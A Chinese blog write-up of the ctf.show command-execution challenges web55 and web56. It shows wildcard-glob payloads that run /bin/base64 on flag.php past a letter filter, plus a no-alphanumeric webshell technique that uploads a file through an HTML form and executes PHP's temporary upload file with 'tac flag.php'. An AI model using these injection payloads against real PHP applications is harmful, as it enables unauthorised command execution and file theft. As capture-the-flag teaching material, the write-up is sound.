命令执行web55-56

web55

解法1

这道题把26个字母都禁用了,但是没有禁用数字,所以我们可以用bin目录下的一些重要的执行文件,例如cat、cp、chmod df、dmesg、gzip、kill、ls、mkdir、more、mount、rm、su、tar、base64等。

由于禁用字母,但base64内有数字,所以我们接下来的思路就是用通配符?来进行匹配。

?c=/bin/base64 flag.php

这是我们实际要用的命令。

?c=/???/????64 ????.???

这是用了通配符的命令,因为有64的存在所以,匹配的就会更精确。

然后解码

拿到flag

解法2

无字母数字webshell

我们可以上传一个post包,如果php接受了这个包,那么我们上传的文件就会被存在php的一个临时文件下(请求结束后会删除临时文件),这个临时文件默认文件名为/tmp/phpXXXXXX,

文件名的后六位是随机的大小写字母和数字,下面是一个post包

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>POST数据包POC</title>
</head>
<body>
<form action="http://14fde086-908c-45a7-a693-6e56815055af.challenge.ctf.show/" method="post" enctype="multipart/form-data">
<!--链接是当前打开的题目链接-->
    <label for="file">文件名:</label>
    <input type="file" name="file" id="file"><br>
    <input type="submit" name="submit" value="提交">
</form>
</body>
</html>

下面是post包的html界面,我们随便上传一个文件,我这的1.txt很随意,没有具体含义,不影响做题。

然后我们开始bp抓包

接着鼠标右键把内容发送到repeater

把多余的东西删去

按图输入

?c=.%20/???/????????[@-[]
#!/bin/sh

shell程序必须以"#!/bin/sh"开始,#! /bin/sh 是指此脚本使用/bin/sh来解释执行,#!是特殊的表示符,其后面跟的是解释此脚本的shell的路径

以及执行内容

tac flag.php

最后拿到flag

web56

这一题比web55禁用的多了数字,所以bin的执行文件就用不了了,但我们还可以用无字母数字webshell。

步骤与web55类似

最后拿到flag

  • 8
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值